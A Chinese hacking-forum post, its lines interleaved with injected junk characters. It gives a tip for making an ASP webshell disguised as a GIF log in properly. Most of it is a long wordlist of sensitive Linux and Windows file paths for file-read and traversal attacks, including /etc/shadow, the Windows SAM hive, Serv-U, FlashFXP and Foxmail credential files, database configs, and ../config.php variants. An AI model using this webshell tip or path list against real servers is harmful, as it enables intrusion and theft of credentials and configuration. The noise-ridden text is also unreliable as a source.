$ P3 }: e1 x6 l4 p; U* {$ iPS:我N年前在邪八讨论过XP下htt提权,由于N年前happy蠕虫的缘故,2K以后都没有folder.htt文件,但是xp下的htt自运行各位大牛给个力~
- L% U% @7 V# i5 U( U. @9 ]asp代码,利用的时候会出现登录问题
& @) i7 L$ ]. R1 Y2 P 原因是ASP大马里有这样的代码:(没有就没事儿了)6 j' P- `9 \; C
url=request.severvariables("url")7 c9 E. @; I7 D- r5 G
这里显示接收到的参数是通过URL来传递的,也就是说登录大马的时候服务器会解析b.asp,于是就出现了问题。* L0 v' D$ {, N1 y
解决方法
3 `6 l, @0 a8 { r/ v url=request.severvariables("path_info")2 W" B/ a) I9 |
path_info可以直接呈现虚拟路径 顺利解析gif大马. S ]6 k% Y7 Z$ _
6 C! S0 ]. s/ Y/ q
==============================================================- g; b/ c0 i6 {. H0 h" f
LINUX常见路径:% Z- G$ X, I" E6 v$ T" _( U( g
. M: V4 J8 w5 \* n- F% W7 k/etc/passwd
: X* R# t0 D& M/etc/shadow0 @9 \3 E8 F4 {" e5 O+ Q9 R
/etc/fstab1 F$ o' c! K3 s# J8 h, f
/etc/host.conf3 g# w0 h1 T0 j5 J8 S
/etc/motd
) d' [4 t. |2 U2 w4 {6 Y/etc/ld.so.conf
% J/ b2 g) T4 o3 h. q; g( X8 T/var/www/htdocs/index.php O6 C- W4 v3 Z6 Z' C
/var/www/conf/httpd.conf
+ ^; V r3 O4 ?! I, P) n% d, H/var/www/htdocs/index.html
\! C( ~! {1 ?( A l( n9 S/var/httpd/conf/php.ini
3 ?/ C- D* u' w3 X- J/var/httpd/htdocs/index.php, T6 n t/ J* l s- E4 w
/var/httpd/conf/httpd.conf
e8 _! M$ F! P) D P/var/httpd/htdocs/index.html2 F) Q8 g& S5 p6 ]
/var/httpd/conf/php.ini, ]: H" Y0 E; D
/var/www/index.html* I8 L' v& n1 J0 e, v
/var/www/index.php
% S9 J; z9 T5 {) R: [- S7 S/opt/www/conf/httpd.conf, }; I# n% M1 m6 J, J' B+ A
/opt/www/htdocs/index.php
5 E5 Z* _( g' Q" d4 r/opt/www/htdocs/index.html
5 {- n& E0 s6 w* {6 Y/ u4 g* ]* p, G( i/usr/local/apache/htdocs/index.html/ r6 O* h$ H+ F
/usr/local/apache/htdocs/index.php
0 M1 j8 [1 I+ U/usr/local/apache2/htdocs/index.html7 U6 }2 `/ W: Z2 } e f
/usr/local/apache2/htdocs/index.php7 }# E1 d, R. G5 O: [8 q( p
/usr/local/httpd2.2/htdocs/index.php
( F$ a: O8 a7 [8 s5 o* i2 E9 m+ t7 }/usr/local/httpd2.2/htdocs/index.html6 C: B3 d3 h" E5 N
/tmp/apache/htdocs/index.html
7 j# E f4 C: @, n4 J; V8 Q/tmp/apache/htdocs/index.php
- K: L" q6 h, ?+ q/etc/httpd/htdocs/index.php+ v7 [/ Q( g `- I1 b
/etc/httpd/conf/httpd.conf+ N! Q* }2 B( z$ P8 E2 Q
/etc/httpd/htdocs/index.html
9 U* m- i. |, E: h" X4 d/www/php/php.ini, s. S' Z4 y( Q7 n0 d H- d
/www/php4/php.ini+ N8 W; d, o+ X: ?7 F
/www/php5/php.ini9 c( o; S2 ?7 D/ v, ]5 C
/www/conf/httpd.conf
8 r, G( X0 y! z6 B# h7 }, y( l* k/www/htdocs/index.php* M& Q% q0 V- V
/www/htdocs/index.html
7 F- @$ k$ O i$ [9 e- S; j/usr/local/httpd/conf/httpd.conf
* ?9 L/ f- f4 U/apache/apache/conf/httpd.conf
7 k0 W( D6 \/ o! O. V, [/apache/apache2/conf/httpd.conf3 E- G+ A$ C* p2 Y! G
/etc/apache/apache.conf
6 K& _: L+ z7 e4 T# j* O& T6 p/etc/apache2/apache.conf
- k' _9 s- ~6 g# g& e/etc/apache/httpd.conf
9 f, T) v9 _ q6 V) Y* o4 W/etc/apache2/httpd.conf
1 G! V* n5 G/ c; ]5 p6 b, V/etc/apache2/vhosts.d/00_default_vhost.conf
; l( |- ^& R+ e9 n" K: b, L/etc/apache2/sites-available/default
) `+ g( `! V7 W/etc/phpmyadmin/config.inc.php: r/ X+ V/ m2 h. C. h
/etc/mysql/my.cnf
6 ]; m& z: P* X) n/etc/httpd/conf.d/php.conf
5 K- Q* c- j' f' v% W; Z& E! E. L/etc/httpd/conf.d/httpd.conf
" k. O7 ~: }; d; l/etc/httpd/logs/error_log1 m. K5 e1 y. a+ k ]- p0 o2 b& x
/etc/httpd/logs/error.log
# s9 y& [& K& }" x/etc/httpd/logs/access_log
1 o1 `" T: h5 W* L/etc/httpd/logs/access.log# S: x1 v: E1 B3 I0 T6 U# v% A
/home/apache/conf/httpd.conf( h/ C& R) @; t X& a {2 m2 C/ n
/home/apache2/conf/httpd.conf
7 n5 v+ U! ?' C9 ]' L$ R- o/var/log/apache/error_log
k* R6 c# z9 M5 M/ K9 c! h# ] k! l/var/log/apache/error.log
) p) r2 |; ^) W/ ^9 U/var/log/apache/access_log
) \3 V$ A7 B* Q! h C0 D/var/log/apache/access.log
" _% g# s' K% z8 ^7 X9 F) R" }/var/log/apache2/error_log6 h+ h. i0 u: A X. M" \5 \- p
/var/log/apache2/error.log9 _7 ?* m0 c& j* j# r
/var/log/apache2/access_log! c" Z; `; P t5 y
/var/log/apache2/access.log6 Z! `0 u; v1 @. w6 Z
/var/www/logs/error_log
! c7 p" z& V0 |$ M/var/www/logs/error.log
! T7 u2 e, F/ P3 P3 A1 [/var/www/logs/access_log
2 L4 Q1 H( T) B; G/var/www/logs/access.log8 ]9 Q1 ?* O/ z; f4 X
/usr/local/apache/logs/error_log% c; f' S3 I- w: M# D z
/usr/local/apache/logs/error.log
' H$ Y* e+ G9 {% l8 v) L/usr/local/apache/logs/access_log: K: E2 F6 S3 y; w: \ V# O
/usr/local/apache/logs/access.log7 h! i3 F' N+ }" r; b- J
/var/log/error_log1 X" z5 I6 r7 z% [9 F4 w% o
/var/log/error.log
! e& x* B* S; K/var/log/access_log& ]9 {- O$ V2 D2 q
/var/log/access.log
# R* X% X( u2 _4 p/usr/local/apache/logs/access_logaccess_log.old
" ]0 I- u% `5 E4 S! Y% @- h7 ^/usr/local/apache/logs/error_logerror_log.old
& i p# `( [, l: A9 k0 I) G( I/etc/php.ini
5 V) \0 f0 p6 u5 w, |, Z) S O/bin/php.ini3 U+ K% i" m& u' x; N! ~2 o4 ?; n/ y
/etc/init.d/httpd
" b% ?) |1 S& k0 O" V1 p& a/etc/init.d/mysql
- A5 p/ {. _4 F _7 M/etc/httpd/php.ini. c+ K$ K+ c, g- J6 D
/usr/lib/php.ini( j. v$ g9 ]- Z4 A0 }8 e" T
/usr/lib/php/php.ini
- x+ N$ J3 L; f% B/usr/local/etc/php.ini
# A+ w2 o: W4 L3 l( ?# g2 N/usr/local/lib/php.ini
2 Z j* q$ Q; D" s5 \# n1 @/usr/local/php/lib/php.ini, ^( R% R! c; D9 K; Q
/usr/local/php4/lib/php.ini
7 Y1 z# s9 J, U6 M2 v8 R/usr/local/php4/php.ini
9 X# Z' N5 ^. y l/usr/local/php4/lib/php.ini' S y$ b* F8 c) @4 P
/usr/local/php5/lib/php.ini X- b' x! Z& L) p
/usr/local/php5/etc/php.ini
9 H* y0 r& L% a. ~, I) u/usr/local/php5/php5.ini
, x. k; R, j0 C# L/usr/local/apache/conf/php.ini
8 ?" t9 m6 k1 z# k9 i/ M- n' t/usr/local/apache/conf/httpd.conf% s1 f- y. D& X7 c4 {
/usr/local/apache2/conf/httpd.conf
3 O. C' L- n" H' _ ?$ Z/usr/local/apache2/conf/php.ini
2 B+ G7 n4 m/ v' D& ]% R/etc/php4.4/fcgi/php.ini% J1 T- v7 J% a3 s% M ^2 [
/etc/php4/apache/php.ini
, Y7 r1 D$ F/ Q; _/etc/php4/apache2/php.ini
1 Y0 J5 ] D. T. ^5 f% L/etc/php5/apache/php.ini
; _; B& o8 A6 C+ ~/etc/php5/apache2/php.ini$ t: {& |$ I$ d: A
/etc/php/php.ini
: ]8 R3 O2 J8 I1 A/ m" e' E/etc/php/php4/php.ini
% h ]) _7 s4 _% m. ~/ ~7 {' d5 ]/etc/php/apache/php.ini- l7 Y P( T. ~; X/ c, N
/etc/php/apache2/php.ini
; J7 `* I0 I H9 F" K/web/conf/php.ini
3 C5 j( r; K) v2 S# ~# q% F: g/usr/local/Zend/etc/php.ini
+ J) t P7 s& \2 A1 T5 n/opt/xampp/etc/php.ini
% ~1 h _5 l. o; j3 J/var/local/www/conf/php.ini
2 c' H, B% n5 t5 a0 N/var/local/www/conf/httpd.conf
7 {; t- V8 L" }8 | [( z3 S/etc/php/cgi/php.ini
4 D/ J# x( X; `9 H( j6 {; M9 m/etc/php4/cgi/php.ini
M# z# b* }) @ G0 `( f/etc/php5/cgi/php.ini1 V1 _6 B$ C& K% h# b# T$ @
/php5/php.ini
! \) C% o% v. `/php4/php.ini2 U/ d }* s G5 W' o6 T
/php/php.ini# X; |8 l% Z$ _
/PHP/php.ini' K1 y8 ]% S& v! z1 O9 I" t; s H
/apache/php/php.ini, g* v% J& a( x) Z5 Q2 g
/xampp/apache/bin/php.ini4 s% X1 m# J3 u, C) t2 q! h0 G2 E
/xampp/apache/conf/httpd.conf
) p& x& b) C1 X. m9 _( `/NetServer/bin/stable/apache/php.ini
! m& [0 o$ }. s6 D; c- n! N/home2/bin/stable/apache/php.ini
5 S( n& c: G+ S4 L/home/bin/stable/apache/php.ini1 P6 n5 P: `$ s I
/var/log/mysql/mysql-bin.log9 a [: X) I5 M3 n
/var/log/mysql.log
' A7 I9 z# ?( S. X; M/var/log/mysqlderror.log' a/ m3 g% N2 ~# M) n- R5 x$ \
/var/log/mysql/mysql.log" e+ k" B7 O+ f* v- x, c
/var/log/mysql/mysql-slow.log) I( \7 H$ f8 M! K9 x$ b# i
/var/mysql.log3 f+ s0 i7 [. Q+ g- }( `6 B# c
/var/lib/mysql/my.cnf: F$ x( p4 f0 M& H6 J t% W2 Y3 ?
/usr/local/mysql/my.cnf
/ v2 p, k6 D' X0 N6 O5 v) A/usr/local/mysql/bin/mysql
% }7 F4 Z% O: i0 [" Z5 p/etc/mysql/my.cnf* ?$ J% S1 b# u. Z0 M* P9 k
/etc/my.cnf
2 k* H! R+ I" E7 \" [; q$ Y/usr/local/cpanel/logs
: }! w7 w9 \& F" U' E% _/usr/local/cpanel/logs/stats_log7 _; J7 j$ H, Z: J) b
/usr/local/cpanel/logs/access_log2 m" v3 e1 _+ c
/usr/local/cpanel/logs/error_log# N/ V# F A* j. W1 P; C5 J5 e$ H$ E$ B
/usr/local/cpanel/logs/license_log* P9 B5 d; s0 q/ Y8 V
/usr/local/cpanel/logs/login_log2 d! i' `5 w, x1 I7 T
/usr/local/cpanel/logs/stats_log# S0 R8 j! D8 v0 N5 u% X/ t
/usr/local/share/examples/php4/php.ini
8 \- w" T3 x2 ?% y0 x/usr/local/share/examples/php/php.ini
6 A9 B& `" a3 {! m# f* o/ \6 Q, O9 V! |: _6 ~* w# O
2..windows常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘)
- J( r. F( N, H* L# |8 \
" z) [5 Z- n' |c:\windows\php.ini
8 k6 H: p7 o/ B# @ z4 Oc:\boot.ini
! x* E. ~, W5 O0 S- A8 }$ {c:\1.txt
6 P Q! M) P- ~c:\a.txt
6 l: c. @) `& Q
4 o( d. k$ Y0 H( y8 f8 u$ hc:\CMailServer\config.ini% p7 K2 f S% D$ R
c:\CMailServer\CMailServer.exe' {* d& T" C! L7 T9 ^$ f( [
c:\CMailServer\WebMail\index.asp
a# v1 _9 a0 z5 Q1 v6 z2 l4 ~* Qc:\program files\CMailServer\CMailServer.exe3 w6 {$ r! L) G8 j0 U
c:\program files\CMailServer\WebMail\index.asp! m& u; [; \1 L& D+ ^
C:\WinWebMail\SysInfo.ini
; n! D, Y1 G+ l/ z tC:\WinWebMail\Web\default.asp) h3 \- |5 A% t1 X4 T+ ]
C:\WINDOWS\FreeHost32.dll
4 s9 ^4 L# w4 T/ i, w+ MC:\WINDOWS\7i24iislog4.exe# d3 q7 [1 I: C, ?/ y1 b/ E
C:\WINDOWS\7i24tool.exe6 I5 w0 P* q$ B4 f
+ f0 C& B/ F9 |7 q3 ~
c:\hzhost\databases\url.asp
. A6 ~7 [* C/ H, w- y
* l, X1 N. V n/ ]c:\hzhost\hzclient.exe- ]0 h, b% {' h" \1 X1 _( n* ?: C
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
( \5 @ l) a& w. A) Y6 N
: \( i5 P$ |" i, z' h* ~4 o7 f4 @C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk$ \8 [& n" y0 F1 w
C:\WINDOWS\web.config
+ ~6 d4 }/ V) ~2 |; v+ dc:\web\index.html% Z4 J- \5 F# l
c:\www\index.html, I) c0 A& |' W. _8 S* Q
c:\WWWROOT\index.html
& E0 l! }+ y3 |c:\website\index.html/ r C- v! k" N0 O9 o
c:\web\index.asp
) _! W" C5 g- Ic:\www\index.asp2 a, B# g# C; `( b7 R% \
c:\wwwsite\index.asp1 d* Y; N) u' E+ o: f
c:\WWWROOT\index.asp
* h& S( t' A6 J h1 p# X. Oc:\web\index.php
P! s% ?" G$ d h7 _c:\www\index.php; |6 m! y+ i+ T; X8 c' J
c:\WWWROOT\index.php. ^' T0 S) b- i0 B4 X7 e3 X- K
c:\WWWsite\index.php* A9 l" v: f9 Z! a: q* U: ~
c:\web\default.html
5 K6 n. q3 f, q0 y6 Tc:\www\default.html: L3 m) C7 B7 L, h
c:\WWWROOT\default.html6 U1 U0 M; y& L; C: {
c:\website\default.html; a6 M1 K: H9 T8 M4 {: D
c:\web\default.asp
$ x0 ~: ]4 \" B* @c:\www\default.asp
. j% _1 g' O: @* hc:\wwwsite\default.asp7 c" S @' P# V- f7 @; A) m" D
c:\WWWROOT\default.asp7 R$ d, Z, ~( e/ N# ^; m2 x, r
c:\web\default.php
) {8 T; J; @5 }& p! j/ j4 Zc:\www\default.php
1 x" n* Y" \! w4 Dc:\WWWROOT\default.php7 t& p% I& g; [0 M( J0 \* E
c:\WWWsite\default.php
# m: {, H/ a7 S, L, ~C:\Inetpub\wwwroot\pagerror.gif
( ~, u' B' M; t6 P- R$ g! tc:\windows\notepad.exe+ d" r% i; V# v# n2 I6 j
c:\winnt\notepad.exe
* D' \2 s% G/ \! g( G8 MC:\Program Files\Microsoft Office\OFFICE10\winword.exe
& ]) i0 w/ L; k0 O, k7 J; f3 qC:\Program Files\Microsoft Office\OFFICE11\winword.exe7 f3 ~* v3 Z6 k
C:\Program Files\Microsoft Office\OFFICE12\winword.exe# j; a3 H$ A& o# }( v" Y! x( d
C:\Program Files\Internet Explorer\IEXPLORE.EXE
$ _/ m. `1 b0 k8 FC:\Program Files\winrar\rar.exe
% o. T2 K# Y* c! g( d* KC:\Program Files\360\360Safe\360safe.exe" ~9 y6 I I0 X: V) u+ A: ?
C:\Program Files\360Safe\360safe.exe3 g, U, r! u5 k' E) X6 b
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log; |: j- q7 M1 Y& ]5 T6 ^ ?1 K/ q
c:\ravbin\store.ini7 D, V k9 }/ g) j( v% u/ g
c:\rising.ini4 n( d0 {' \/ p9 h# p$ e0 K
C:\Program Files\Rising\Rav\RsTask.xml
+ Q9 Q7 v8 w V2 U4 wC:\Documents and Settings\All Users\Start Menu\desktop.ini
$ Q' T7 I3 q P3 ~C:\Documents and Settings\Administrator\My Documents\Default.rdp9 t' w, A4 ?8 Z- D
C:\Documents and Settings\Administrator\Cookies\index.dat+ C% l K# `7 K4 `/ z( A( w
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt/ M1 E5 q5 o; l7 k' y
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
( D/ m% u V6 Z EC:\Documents and Settings\Administrator\My Documents\1.txt
- S4 _1 P- L. s. Z% TC:\Documents and Settings\Administrator\桌面\1.txt- h1 i& w' h% L( v3 ?! ?
C:\Documents and Settings\Administrator\My Documents\a.txt
0 @) M& t) Q0 n0 \: o. B) PC:\Documents and Settings\Administrator\桌面\a.txt4 _7 @3 g3 o6 ?7 f% E
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
7 z4 X2 K. R: b6 r3 u; n) j3 X( WE:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm6 K& z, F- A. _& ~$ {8 E+ e
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
' I" \; E l# J$ k0 yC:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
- t5 V0 _! {* G: |) _4 p) YC:\Program Files\Symantec\SYMEVENT.INF v% J0 D* x8 s v
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe- D4 @+ }# ^" u# @$ Z
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf" _7 w" |+ }3 H) I$ l$ [& B0 S
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
( Y' X- q5 g# d, }! Y! oC:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
* P" z5 s1 N2 ]1 q$ y* W4 N1 aC:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm; R- ?' W( Z1 r
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT' U6 J5 X1 a/ X3 {
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
$ e, M: [. [: w* N& r" pC:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
- p# q1 |. l: s1 oC:\MySQL\MySQL Server 5.0\my.ini0 q, u. `, B+ N% |9 l
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
0 j* s M6 x5 B8 a+ V0 R% t6 R+ ]# AC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm' P- p4 G$ n/ x; H
C:\Program Files\MySQL\MySQL Server 5.0\COPYING7 j) L4 K0 t( n1 E. w& D- P) r0 l/ f
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
! \4 b" P- y# UC:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
; K4 N3 Q% F; x' ^" ~; Qc:\MySQL\MySQL Server 4.1\bin\mysql.exe" `* S* q3 v* N
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
" } n( E* n: x# pC:\Program Files\Oracle\oraconfig\Lpk.dll
& y7 `) ~' r# W w. }C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
8 ]* T/ h+ a% e/ R. P9 @; zC:\WINDOWS\system32\inetsrv\w3wp.exe; A4 t8 T8 t8 J0 G
C:\WINDOWS\system32\inetsrv\inetinfo.exe3 @' ~& a. y# D, }6 b
C:\WINDOWS\system32\inetsrv\MetaBase.xml% T/ n: X# n+ h9 X0 ]: z
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
0 a* O# I* _- q* J" }C:\WINDOWS\system32\config\default.LOG' C3 S& H) H7 U
C:\WINDOWS\system32\config\sam
: P# D, I* }2 q% NC:\WINDOWS\system32\config\system$ b2 z1 S1 U4 c2 H
c:\CMailServer\config.ini
+ b5 n, M6 S2 i' |) o* gc:\program files\CMailServer\config.ini6 ~7 I, Q. [( L X
c:\tomcat6\tomcat6\bin\version.sh) {9 }3 A% r1 F( F' ^7 \
c:\tomcat6\bin\version.sh4 z+ \9 X' \# G: M1 ^4 S8 U$ ]$ \
c:\tomcat\bin\version.sh
( l8 o8 x: S. R5 w. n( @, Bc:\program files\tomcat6\bin\version.sh3 M0 X3 B: p$ q/ ]- O% ^% C" O
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh$ g/ d! P% [3 O% j$ b
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
9 s* h1 ?( U) Bc:\Apache2\Apache2\bin\Apache.exe. k3 ^+ S2 o; }% A# O
c:\Apache2\bin\Apache.exe
; B1 i: S4 H4 |$ }" l# Kc:\Apache2\php\license.txt3 L0 O' _! O) Y5 }8 L$ c* O
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
# J) k# T8 {- |9 V+ Q' i/usr/local/tomcat5527/bin/version.sh! X4 [9 d: j3 f+ ]3 M
/usr/share/tomcat6/bin/startup.sh2 Z$ E+ T% Z0 H" {/ F' Q9 h6 A* j
/usr/tomcat6/bin/startup.sh7 r5 Q" a) V, N% x5 |6 ~9 x: [
c:\Program Files\QQ2007\qq.exe
. C; P2 I+ Y7 U, w- Fc:\Program Files\Tencent\qq\User.db
1 q1 R7 D9 c5 w; E; m- jc:\Program Files\Tencent\qq\qq.exe
$ ^- d* b% D& t2 c# e0 f+ xc:\Program Files\Tencent\qq\bin\qq.exe+ e2 z6 t: `* l8 N. [3 s
c:\Program Files\Tencent\qq2009\qq.exe6 b1 _" S+ K# t& |) a9 W8 g
c:\Program Files\Tencent\qq2008\qq.exe
9 h% S; Z9 j0 \% A/ oc:\Program Files\Tencent\qq2010\bin\qq.exe
& _8 }1 X G2 ~c:\Program Files\Tencent\qq\Users\All Users\Registry.db
7 y5 |) W& F& j) X1 SC:\Program Files\Tencent\TM\TMDlls\QQZip.dll1 S/ I9 |' M3 k4 x. {, t
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe* k& b# ?0 ?; d# U
c:\Program Files\Tencent\RTXServer\AppConfig.xml- ^3 f" X ]: s" A* a5 H
C:\Program Files\Foxmal\Foxmail.exe
9 x B& S! O |4 \6 w: YC:\Program Files\Foxmal\accounts.cfg
4 F8 r. z& p. A! e8 w& @; X W4 mC:\Program Files\tencent\Foxmal\Foxmail.exe
0 w0 w" m, v4 s/ ?8 y7 TC:\Program Files\tencent\Foxmal\accounts.cfg# B5 F9 w8 N+ Y, ?* ~- [
C:\Program Files\LeapFTP 3.0\LeapFTP.exe3 y( j7 B6 C6 G$ ?. m1 ~8 n
C:\Program Files\LeapFTP\LeapFTP.exe
. j% @1 x& u ?+ W& sc:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe4 L/ e& K+ ~. X, B* i
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
, J9 _( J8 P4 W" y6 u1 `C:\Program Files\FlashFXP\FlashFXP.ini0 V. o1 Z9 N, _: v
C:\Program Files\FlashFXP\flashfxp.exe& u, x- c& w2 d* ]
c:\Program Files\Oracle\bin\regsvr32.exe; l& `- W. D$ m' b
c:\Program Files\腾讯游戏\QQGAME\readme.txt
/ {4 Y# [: A1 ?. Y3 Z. ^- hc:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
+ }) f; o4 c$ M0 L, [c:\Program Files\tencent\QQGAME\readme.txt
q) e. c$ l0 `( y, D# [C:\Program Files\StormII\Storm.exe s8 F7 Z/ [% l7 i% F
' E M: _6 d$ E* p! e3.网站相对路径:8 t; o! a5 [+ O1 f- U0 K) ]
- P5 O0 K, `( k d4 w$ G
/config.php! o. [0 E+ E- q
../../config.php2 Q. Y: p/ f2 v2 S
../config.php
* S* f3 a: Y3 R1 t../../../config.php
$ ]& r8 B. m+ `5 E# I: ^/config.inc.php' G- h! \4 p: o* X6 @ k7 z
./config.inc.php
) c2 X: w- v$ Z, m L R' `../../config.inc.php2 {1 G! ~/ D4 E0 V5 y3 U7 z* I
../config.inc.php
$ I4 q U5 F: o, n../../../config.inc.php
6 G- T' L* {% B% o6 y/conn.php
4 M; a J n) ]& P# S$ i( H./conn.php
! }# G' m1 h) \( U& }+ L../../conn.php! [6 \" {! \& U Z7 q
../conn.php1 v7 T% u: q' e6 V/ x4 w$ ]% S) m# Y
../../../conn.php9 s# _" \7 @1 q5 {
/conn.asp; ?6 Z- K/ I9 v& x5 d
./conn.asp6 f( ]) Z5 {8 v5 Y$ Q; S
../../conn.asp6 q/ B7 Q% Q) G2 I1 E
../conn.asp$ ?# M' w5 A: X" S& B: c; H
../../../conn.asp& G4 G- X6 P. q" ~
/config.inc.php5 L3 n( C* | Z& T9 m: t; A
./config.inc.php* R0 S3 R$ t6 h. l# t
../../config.inc.php
$ o5 i$ Z' `4 K- m, |6 `7 L../config.inc.php) t! \$ P% y8 F$ c! s, e
../../../config.inc.php
3 m" O5 f/ q8 k6 b% d. I( \/config/config.php
6 N% U2 q. S' f3 n' x/ X6 @../../config/config.php
4 A5 R7 m$ e/ c9 q6 B0 C2 t; `; K../config/config.php3 X! b) x9 t8 J9 t7 o
../../../config/config.php" j! S5 b: h+ G4 `9 C
/config/config.inc.php4 f' Y1 p* ~" ^# B% J" _$ Y
./config/config.inc.php
% p6 A8 R9 J! M4 {( z2 ]" j, a../../config/config.inc.php
6 R& v2 D9 K j( H../config/config.inc.php
5 G8 T3 @' M9 o& g9 J9 j../../../config/config.inc.php
- K: ~ Q4 D9 h/config/conn.php) _9 Q) h- I% S3 L+ t$ R7 c5 b: c# A
./config/conn.php
) k8 H# _& w# [../../config/conn.php2 E. T; E; W; R; A
../config/conn.php: F. ]7 w- a! ?- c' s! A) U+ a6 U
../../../config/conn.php
" @ ^; ^! ?/ l: e& M; N8 R/config/conn.asp
( X( N5 p% n9 e8 l- R+ p3 q6 C- O) [./config/conn.asp
/ P6 O, p1 ]7 R- p9 ^$ I. B../../config/conn.asp9 f* {) P7 K9 y$ E) @/ d2 X3 f
../config/conn.asp# y# \9 m$ d( j) ^2 Q9 ~
../../../config/conn.asp' Q# a% B/ }6 q4 L% u7 d; @
/config/config.inc.php
, U3 h+ N# q* h, E6 E! H. d6 k./config/config.inc.php
2 _5 U; O" b' z, V* [' c../../config/config.inc.php
3 c8 s4 f9 L7 [ O- P../config/config.inc.php
/ P9 F2 P U ^5 y../../../config/config.inc.php3 ]' J) D; t7 ^
/data/config.php
) ?* R; u' [& i7 r: F4 K../../data/config.php3 j; Y. J: B! |
../data/config.php
9 D4 T, b: M0 Z../../../data/config.php
, S9 M8 P7 s9 o5 Y: R/data/config.inc.php
6 r& J$ b* \6 I./data/config.inc.php& h4 O- h5 W( m: L
../../data/config.inc.php9 Y7 Q7 W0 P; E1 W( {! W
../data/config.inc.php' U8 @* v: |2 H/ W
../../../data/config.inc.php
+ l8 X# w- l0 ]% ?- e; H/data/conn.php9 v8 k3 X1 P& K. H
./data/conn.php2 e6 B- A% @: ~! j1 D
../../data/conn.php6 G) a3 U. y$ ]$ m; @
../data/conn.php
8 M4 v* y1 F, `- k3 N( G4 O../../../data/conn.php
8 h# i7 `: J/ L* ?* a' Q/data/conn.asp f7 ]% i& X8 t9 e8 u
./data/conn.asp' Y0 m' V/ O8 l- O, p% ]
../../data/conn.asp& n* M" E7 M( B: L
../data/conn.asp
" F9 v8 f5 B4 G# g../../../data/conn.asp6 j( M% i: y# `, w o
/data/config.inc.php
/ W$ z8 j& b; T) h9 ?* W5 p1 ?./data/config.inc.php1 Q: q6 y; B' k' \* G
../../data/config.inc.php
, M& j( E& e [$ o) A6 a3 w../data/config.inc.php3 {; C0 y' N1 ^
../../../data/config.inc.php0 F' b8 o5 {6 h6 u+ [1 o
/include/config.php. j, K/ d# W* J
../../include/config.php f' B! G6 J T2 i8 w% Q) a- Q
../include/config.php
( m7 ]+ f9 ?* z& w$ K$ z; D5 C../../../include/config.php
/ W/ g. o% i# V/include/config.inc.php
- e# Y; U3 `. u/ C* ~7 ~./include/config.inc.php
9 V# `; {, s4 f+ Q# [../../include/config.inc.php
! z4 @9 D$ Y% `5 q5 m6 I4 }. R: d../include/config.inc.php, i" X% |5 ^. K
../../../include/config.inc.php
, L" c5 I ]% B! j- ?; b/include/conn.php
0 k- Y% V! t! V./include/conn.php
' ?; _' z$ }: y# w" `../../include/conn.php
! B% J) Z* w* Q% {0 _( }../include/conn.php
1 v( ?, R2 {0 D; A../../../include/conn.php" A: x7 b5 n# g/ A- B" C+ ^$ {
/include/conn.asp
8 r: E3 G5 l* }$ u+ B. W./include/conn.asp7 R5 E% n; `8 | I
../../include/conn.asp; Z7 c3 V4 p% O" d% p7 B" Q; w; i
../include/conn.asp3 a$ k- j( {1 J: L5 X* _
../../../include/conn.asp
( Q7 d! l3 P8 e1 M+ Q6 w/include/config.inc.php2 W3 ~0 h$ n3 N
./include/config.inc.php
0 }* m7 {& U" X8 Q/ l../../include/config.inc.php/ I/ \! m. G) Q1 z. w+ G, Y
../include/config.inc.php
B/ j% C8 r/ [../../../include/config.inc.php! }( \0 \% e3 `8 R7 t/ x
/inc/config.php
" ~+ s' m- ~6 ^../../inc/config.php
3 u& S& p) ^' P1 z../inc/config.php! p' J( h' u* U9 w! {2 k
../../../inc/config.php1 M$ P) J! A* i' y% p' u6 Q$ Z# Z
/inc/config.inc.php' \8 j+ W: @; }- r7 W
./inc/config.inc.php
% v' A0 M8 B/ j4 Y- Y$ b../../inc/config.inc.php
/ }2 [6 @" V8 H' D$ W. y../inc/config.inc.php# ~: v' w8 y% }6 g! B# k
../../../inc/config.inc.php
% D7 Q- _0 e* q' ~/inc/conn.php
" j2 l9 X2 M% [& u9 s9 I( m, E./inc/conn.php
2 {1 `+ g5 G- y" G# a) R8 Q, e../../inc/conn.php" F6 B% F6 c0 M6 V: C
../inc/conn.php6 L, G. s5 q Q% J/ G: p8 _
../../../inc/conn.php+ A7 u( D: O, `( l( n. n
/inc/conn.asp$ ]" ^- M8 G, ]( @7 \
./inc/conn.asp
! a- E- C& y3 ^$ B- ~../../inc/conn.asp6 V% ]' Q1 X& Z. e8 E; F
../inc/conn.asp* Y, O! u3 H$ ^3 t& O+ _
../../../inc/conn.asp
, q7 U1 A* J& J, v/inc/config.inc.php8 m3 h0 q7 Z/ B& I4 [
